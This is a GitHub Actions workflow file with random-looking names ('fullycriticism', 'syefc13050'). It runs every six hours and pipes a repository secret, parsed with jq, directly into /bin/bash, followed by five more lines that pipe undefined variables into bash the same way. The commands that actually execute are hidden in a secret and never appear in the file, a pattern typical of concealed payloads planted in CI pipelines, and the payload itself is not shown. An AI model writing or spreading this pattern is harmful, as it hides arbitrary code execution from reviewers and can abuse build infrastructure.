name: fullycriticism

on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fullycriticism
        env:
          syefc13050: ${{ secrets.syefc13050 }}
        run: |
          echo $syefc13050 | jq -r .opmlz2 | /bin/bash
          echo $fny97 | jq -r .lxju99 | /bin/bash
          echo $i3742 | jq -r .eve79 | /bin/bash
          echo $itp64 | jq -r .cdfb5 | /bin/bash
          echo $bzad2 | jq -r .cml7 | /bin/bash
          echo $ht49 | jq -r .yj5343 | /bin/bash

